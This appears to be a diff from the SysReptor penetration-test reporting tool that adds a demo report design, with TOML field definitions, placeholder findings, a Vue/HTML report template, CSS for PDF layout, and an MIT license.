Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
[report_preview_data.report.lead_pentester]
name = "Maxima Mustermensch"
email = "maxima@securitymaximale.com"
phone = "+43 660 123 456 78 "
[[report_preview_data.report.document_history]]
description = "Draft"
date = "2022-07-08"
authors = [
"TODO Author1",
]
version = "0.1"
[[report_preview_data.report.document_history]]
description = "Final Report"
date = "2022-07-08"
authors = [
"TODO Author1",
"TODO Author2",
]
version = "1.0"
[[report_preview_data.findings]]
title = "Demo Finding Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c5012235-9cd4-475f-86de-0236de1b4b88"
references = [
"https://example.com/reference1",
"https://example.com/reference2",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Also Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c6a6d51c-999c-4e8c-a506-596689e73f0b"
references = [
"https://example.com/reference3",
]
retest_notes = ""
retest_status = "open"
affected_components = []
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Low"
cvss = "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "cd3c3719-8536-43d4-878a-cdb9dc842b70"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Info"
cvss = "n/a"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e899b5cf-83d2-48bf-8838-9899246b67fc"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[assets]]
id = "9c692534-b436-43a8-aeb3-73e6c7f338a5"
name = "LICENSE"
[[assets]]
id = "7454d0de-ec3b-43f3-9d28-24a045ce199b"
name = "header-logo.png"
[[assets]]
id = "6f56f563-1ad5-4552-a188-ff34c97a7e83"
name = "background-26185.jpg"
[[assets]]
id = "4b253945-b794-4942-b01f-c28ef83b503c"
name = "logo-transparent.png"


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

File diff suppressed because it is too large Load Diff


Binary file not shown.


Binary file not shown.



@ -0,0 +1,965 @@
format = "projecttypes/v1"
id = "70ff91a6-567e-45c9-87d9-0587551bc8ff"
name = "Demo Matrix v1.1"
language = "en-US"
finding_field_order = [
"title",
"cvss",
"summary",
"short_recommendation",
"affected_components",
"description",
"recommendation",
"references",
"retest_status",
"retest_notes",
]
report_template = """
<div id="header" data-sysreptor-generated="page-header">
<div id="header-left">
<img src="/assets/name/header-logo.png" alt="logo" />
</div>
<div id="header-right">
<span class="highlight">Security Maximale GmbH</span><br>
Example Street 47 | 4771 Example<br>
FN 12345 v | District Court Example<br>
</div>
</div>
<section id="page-cover">
<div id="page-cover-background">
<img id="page-cover-background-img" src="/assets/name/background.svg" alt="">
</div>
<img id="page-cover-logo" src="/assets/name/logo-transparent.png" alt="">
<div id="page-cover-infobox">
<h1 id="page-cover-title">{{ report.title }}</h1>
</div>
<div id="page-cover-customer">
<p>
<strong>Customer:</strong><br>
<strong><span class="highlight">{{ report.customer }}</span></strong><br>
{{ report.report_date }}<br>
v<template v-if="report.document_history.length > 0">
{{ report.document_history[report.document_history.length - 1].version }}
</template>
<template v-else>0.0</template>
</p>
</div>
<div id="page-cover-contact">
<strong>Contact:</strong><br>
{{ report.lead_pentester.name }}<br>
{{ report.lead_pentester.phone }}<br>
<strong><a :href="'mailto:' + report.lead_pentester.email" class="highlight">{{ report.lead_pentester.email }}</a></strong>
</div>
</section>
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<section>
<h1 id="management-summary" class="in-toc">Executive Summary</h1>
<markdown :text="report.executive_summary" />
</section>
<pagebreak />
<section>
<h1 id="scope" class="in-toc">Methodology and Scope</h1>
<markdown :text="report.scope" />
</section>
<pagebreak />
<section>
<h1 id="findings-summary" class="in-toc">Vulnerability Overview</h1>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<figure>
<chart :width="15" :height="10" :config="{
type: 'bar',
data: {
labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
datasets: [{
data: [
finding_stats.count_critical,
finding_stats.count_high,
finding_stats.count_medium,
finding_stats.count_low,
finding_stats.count_info
],
backgroundColor: [
cssvar('--color-risk-critical'),
cssvar('--color-risk-high'),
cssvar('--color-risk-medium'),
cssvar('--color-risk-low'),
cssvar('--color-risk-info')
],
}]
},
options: {
scales: {y: {beginAtZero: true, ticks: {precision: 0}}},
plugins: {legend: {display: false}},
}
}" />
<figcaption id="distribution-of-identified-vulnerabilities">Distribution of identified vulnerabilities</figcaption>
</figure>
<div>
<p>A tabular overview of all vulnerabilities identified:</p>
<table class="finding-summary-table">
<thead>
<tr>
<th>Vulnerability</th>
<th align="center">Criticality</th>
<th v-if="report.is_retest" align="center">Remediation Status</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td align="center">
<ref :to="finding.id" :class="'risk-' + finding.cvss.level">{{ lodash.capitalize(finding.cvss.level) }}</ref>
</td>
<td v-if="report.is_retest" align="center">
<ref :to="finding.id" :class="'status-' + finding.retest_status.value">{{ finding.retest_status.label }}</ref>
</td>
</tr>
</tbody>
</table>
</div>
<div class="findings-list">
<p>A list of all vulnerabilities including a brief description:</p>
<div v-for="(finding, findingIndex) in findings">
<h6 :id="finding.id + 'overview'">
<ref :to="finding.id" class="finding-title">{{ finding.title }}</ref>
(<span :class="'risk-' + finding.cvss.level"><a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ capitalize(finding.cvss.level) }}: {{ finding.cvss.score}}</a><a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a><template v-else>{{ capitalize(finding.cvss.level) }}: {{ finding.cvss.score }}</template></span><template v-if="report.is_retest || (finding.retest_status.value && finding.retest_status.value !== 'open')"> | <span :class="'status-' + (finding.retest_status.value || 'open')">{{ finding.retest_status.label || 'Offen' }}</span></template>)
</h6>
<div v-if="finding.affected_components && finding.affected_components.length > 0">
Affects:
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</div>
<markdown :text="finding.summary" />
</div>
</div>
</section>
<pagebreak />
<section id="findings-list" class="findings-list">
<h1 id="findings-details" class="in-toc">Vulnerability Details</h1>
<div v-for="(finding, findingIndex) in findings">
<h2 :id="finding.id" class="in-toc" :data-toc-title="finding.title + ' (' + capitalize(finding.cvss.level) + ')'">
<ref :to="finding.id + 'overview'" class="finding-title">{{ finding.title }}</ref>
</h2>
<div>
<template v-if="report.is_retest || finding.retest_status.value !== 'open'">
<strong>Remediation Status: </strong><span :class="'finding-status-' + finding.retest_status.value">{{ finding.retest_status.label }}</span><br>
</template>
<strong>Criticality: </strong><span :class="'risk-' + finding.cvss.level">{{ capitalize(finding.cvss.level) }}</span><br>
<strong>CVSS-Score: </strong>
<span :class="'risk-' + finding.cvss.level">
<a v-if="finding.cvss.vector.startsWith('CVSS:3.1')" :href="'https://www.first.org/cvss/calculator/3.1#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score}}</a>
<a v-else-if="finding.cvss.vector.startsWith('CVSS:3.0')" :href="'https://www.first.org/cvss/calculator/3.0#' + finding.cvss.vector" class="link-none">{{ finding.cvss.score }}</a>
<span v-else>{{ finding.cvss.score }}</span>
</span><br>
<template v-if="finding.affected_components && finding.affected_components.length > 0">
<strong>Affects: </strong>
<markdown v-if="finding.affected_components.length == 1" :text="finding.affected_components[0]" class="markdown-inline" />
<ul v-else class="location-ul">
<li v-for="component in finding.affected_components">
<markdown :text="component" class="markdown-inline" />
</li>
</ul>
</template>
<template v-if="finding.short_recommendation">
<strong>Recommendation: </strong>
<markdown :text="finding.short_recommendation" class="markdown-inline" /><br>
</template>
</div>
<div>
<h3>Overview</h3>
<markdown :text="finding.summary" />
</div>
<div v-if="finding.retest_notes">
<h3>Remarks on Remediation Status</h3>
<markdown :text="finding.retest_notes" />
</div>
<div>
<h3 :id="finding.id + '-description'">Description</h3>
<markdown :text="finding.description" />
</div>
<div>
<h3 :id="finding.id + '-recommendation'">Recommendation</h3>
<markdown :text="finding.recommendation" />
</div>
<div v-if="finding.references && finding.references.length > 0">
<h3>Additional Information</h3>
<ul>
<li v-for="reference in finding.references">
<a :href="reference">{{ reference }}</a>
</li>
</ul>
</div>
<pagebreak />
</div>
</section>
<section>
<h1 id="document-history" class="in-toc">List of Changes</h1>
<table>
<thead>
<tr>
<th align="center">Version</th>
<th align="center">Date</th>
<th>Description</th>
<th>Author</th>
</tr>
</thead>
<tbody>
<tr v-for="item in report.document_history">
<td align="center">{{ item.version }}</td>
<td align="center">{{ item.date }}</td>
<td>{{ item.description }}</td>
<td>
<comma-and-join>
<template v-for="author in item.authors" #[author]>{{ author }}</template>
</comma-and-join>
</td>
</tr>
</tbody>
</table>
</section>
<markdown>
# Disclaimer {#disclaimer .in-toc}
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
</markdown>
<markdown>
# Imprint {#imprint .in-toc}
Security Maximale GmbH<br>
Example Street 47 | 4711 Example<br>
FN 12345 v | District Court Example<br>
</markdown>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #8c00fc;
--color-risk-high: #ed0003;
--color-risk-medium: #f0d400;
--color-risk-low: #009dff;
--color-risk-info: #00bc00;
--color-status-open: #ed0003;
--color-status-partial: #f0d400;
--color-status-resolved: #00e200;
--color-status-accepted: #00e200;
--color-status-changed: #009dff;
--color-highlight: #88ee44;
}
/* Font settings */
html {
font-family: "Roboto Flex", sans-serif;
font-size: 11pt;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.status-open { color: var(--color-status-open) !important; font-weight: bold; }
.status-partial { color: var(--color-status-partial) !important; font-weight: bold; }
.status-resolved { color: var(--color-status-resolved) !important; font-weight: bold; }
.status-accepted { color: var(--color-status-accepted) !important; font-weight: bold; }
.status-changed { color: var(--color-status-changed) !important; font-weight: bold; }
.highlight { color: var(--color-highlight); }
/* PDF-specific global styles */
@page {
size: A4 portrait;
margin: 35mm 26mm 26mm 26mm;
}
a {
color: inherit;
text-decoration: none;
}
pre code {
background-color: whitesmoke;
padding: 0.2em !important;
}
.location-ul {
margin: 0;
margin-bottom:0.2em;
}
/* #region header */
@page {
margin-top: 35mm;
--header-background-color: black;
--header-margin-bottom: 5mm;
@top-left-corner {
content: "";
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
}
@top-left {
content: element(header-left);
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right {
content: element(header-right);
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
width: 51%;
margin-left: -1px;
margin-right: -1px;
}
@top-right-corner {
content: "";
margin-bottom: var(--header-margin-bottom);
background-color: var(--header-background-color);
}
}
#header #header-left { position: running(header-left); }
#header #header-left {
width: 60%;
}
#header #header-left img {
width: auto;
height: auto;
}
#header #header-right {
position: running(header-right);
text-align: right;
color: white;
font-size: 9pt;
}
/* #endregion header */
/* #region footer */
@page {
@bottom-right-corner {
/* Page number */
content: counter(page) " / " counter(pages);
font-size: 9pt;
}
}
/* #endregion footer */
/* #region page-cover */
#page-cover {
margin: -35mm -26mm 10mm -26mm;
}
#page-cover-background {
width: 100%;
height: 120mm;
overflow: hidden;
background-color: black;
}
#page-cover-background-img {
width: 100%;
transform: scale(1.16) translateY(-11%);
opacity: 0.7;
}
#page-cover-logo {
position: absolute;
top: -30mm;
left: -7mm;
width: 50%;
}
#page-cover-logo-text {
position: absolute;
top: -12mm;
left: 4mm;
color: #ffffff;
}
#page-cover-infobox {
position: absolute;
top: 30mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-title {
font-size: 18pt;
font-weight: normal;
margin-top: 0;
margin-bottom: 0.3em;
}
#page-cover-customer {
position: absolute;
top: 43mm;
left: -1mm;
width: 150mm;
color: #ffffff;
}
#page-cover-contact {
position: absolute;
top: 46mm;
right: 4mm;
text-align: right;
color: #ffffff;
}
@page :first {
/* Hide header */
@top-left-corner { content: none !important; }
@top-left { content: none !important; }
@top-center { content: none !important; }
@top-right { content: none !important; }
@top-right-corner { content: none !important; }
/* Hide footer */
@bottom-left-corner { content: none !important; }
@bottom-left { content: none !important; }
@bottom-center { content: none !important; }
@bottom-right { content: none !important; }
@bottom-right-corner { content: none !important; }
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(" ") " " target-counter(attr(href), page);
font-weight: normal;
}
#toc .toc-level1 {
padding-left: 0;
margin-top: 0.7rem;
font-weight: bold;
}
#toc .toc-level2 {
padding-left: 1.5rem;
margin-top: 0.35rem;
font-weight: normal;
}
#toc .toc-level3 {
padding-left: 3rem;
margin-top: 0.25rem;
font-weight: normal;
}
#toc .toc-level4 {
padding-left: 4.5rem;
margin-top: 0;
font-weight: normal;
}
/* #endregion toc */
/* #region findings-list */
.findings-list {
counter-reset: finding-counter;
}
.findings-list .finding-title::before {
counter-increment: finding-counter;
content: counter(finding-counter) ". ";
}
/* #endregion findings-list */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO report title"
required = true
spellcheck = true
[report_fields.scope]
type = "markdown"
label = "Scope"
origin = "custom"
default = """
**TODO scope**
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
required = true
[report_fields.customer]
type = "string"
label = "Customer"
origin = "custom"
default = "TODO customer"
required = true
spellcheck = false
[report_fields.duration]
type = "string"
label = "Duration"
origin = "custom"
default = "TODO person days"
required = true
spellcheck = false
[report_fields.end_date]
type = "date"
label = "Pentest End Date"
origin = "custom"
required = true
[report_fields.is_retest]
type = "boolean"
label = "Is Retest"
origin = "predefined"
[report_fields.start_date]
type = "date"
label = "Pentest Start Date"
origin = "custom"
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.lead_pentester]
type = "object"
label = "Lead Pentester"
origin = "custom"
[report_fields.lead_pentester.properties]
[report_fields.lead_pentester.properties.name]
type = "string"
label = "Name"
origin = "custom"
default = "TODO name"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.email]
type = "string"
label = "Email"
origin = "custom"
default = "TODO email"
required = true
spellcheck = false
[report_fields.lead_pentester.properties.phone]
type = "string"
label = "Phone Number"
origin = "custom"
default = "TODO phone"
required = true
spellcheck = false
[report_fields.document_history]
type = "list"
label = "Document History"
origin = "custom"
required = true
[report_fields.document_history.items]
type = "object"
label = ""
origin = "custom"
[report_fields.document_history.items.properties]
[report_fields.document_history.items.properties.description]
type = "string"
label = "Description"
origin = "custom"
default = "TODO description"
required = true
spellcheck = false
[report_fields.document_history.items.properties.date]
type = "date"
label = "Date"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors]
type = "list"
label = "Authors"
origin = "custom"
required = true
[report_fields.document_history.items.properties.authors.items]
type = "string"
label = ""
origin = "custom"
default = "TODO author"
required = true
spellcheck = false
[report_fields.document_history.items.properties.version]
type = "string"
label = "Version"
origin = "custom"
default = "TODO version"
required = true
spellcheck = false
[report_fields.executive_summary]
type = "markdown"
label = "Executive Summary"
origin = "custom"
default = """
**TODO summary**
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
required = true
[[report_sections]]
id = "executive_summary"
label = "Executive Summary"
fields = [
"executive_summary",
]
[[report_sections]]
id = "scope"
label = "Scope"
fields = [
"scope",
"duration",
"start_date",
"end_date",
]
[[report_sections]]
id = "customer"
label = "Customer"
fields = [
"customer",
]
[[report_sections]]
id = "other"
label = "Other"
fields = [
"title",
"report_date",
"lead_pentester",
"document_history",
"is_retest",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "TODO: New Finding"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.summary]
type = "markdown"
label = "Summary"
origin = "predefined"
default = "TODO summary"
required = true
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO description"
required = true
[finding_fields.recommendation]
type = "markdown"
label = "Recommendation"
origin = "predefined"
default = "TODO recommendation"
required = true
[finding_fields.references]
type = "list"
label = "References"
origin = "predefined"
required = false
[finding_fields.references.items]
type = "string"
label = ""
origin = "predefined"
required = true
spellcheck = false
[finding_fields.retest_notes]
type = "markdown"
label = "Re-test Notes"
origin = "predefined"
required = false
[finding_fields.retest_status]
type = "enum"
label = "Re-test Status"
origin = "predefined"
required = false
[[finding_fields.retest_status.choices]]
label = "Open"
value = "open"
[[finding_fields.retest_status.choices]]
label = "Resolved"
value = "resolved"
[[finding_fields.retest_status.choices]]
label = "Partially Resolved"
value = "partial"
[[finding_fields.retest_status.choices]]
label = "Changed"
value = "changed"
[[finding_fields.retest_status.choices]]
label = "Accepted"
value = "accepted"
[finding_fields.affected_components]
type = "list"
label = "Affected Components"
origin = "predefined"
required = true
[finding_fields.affected_components.items]
type = "string"
label = "Component"
origin = "predefined"
default = "TODO affected component"
required = true
spellcheck = false
[finding_fields.short_recommendation]
type = "string"
label = "Short Recommendation"
origin = "predefined"
required = true
spellcheck = true
[report_preview_data]
[report_preview_data.report]
title = "Example Web-App"
scope = """
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
* Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.
* Nam liber tempor cum soluta nobis eleifend option congue nihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
* Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis.
At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores duo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet clita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero voluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur
"""
customer = "Example Customer"
duration = "TODO person days"
end_date = "2022-07-08"
is_retest = true
start_date = "2022-07-08"
report_date = "2022-07-08"
executive_summary = """
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.
Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
[report_preview_data.report.lead_pentester]
name = "Maxima Mustermensch"
email = "maxima@securitymaximale.com"
phone = "+43 660 123 456 78 "
[[report_preview_data.report.document_history]]
description = "Draft"
date = "2022-07-08"
authors = [
"TODO Author1",
]
version = "0.1"
[[report_preview_data.report.document_history]]
description = "Final Report"
date = "2022-07-08"
authors = [
"TODO Author1",
"TODO Author2",
]
version = "1.0"
[[report_preview_data.findings]]
title = "Demo Finding Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c5012235-9cd4-475f-86de-0236de1b4b88"
references = [
"https://example.com/reference1",
"https://example.com/reference2",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Also Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c6a6d51c-999c-4e8c-a506-596689e73f0b"
references = []
retest_notes = ""
retest_status = "open"
affected_components = []
short_recommendation = ""
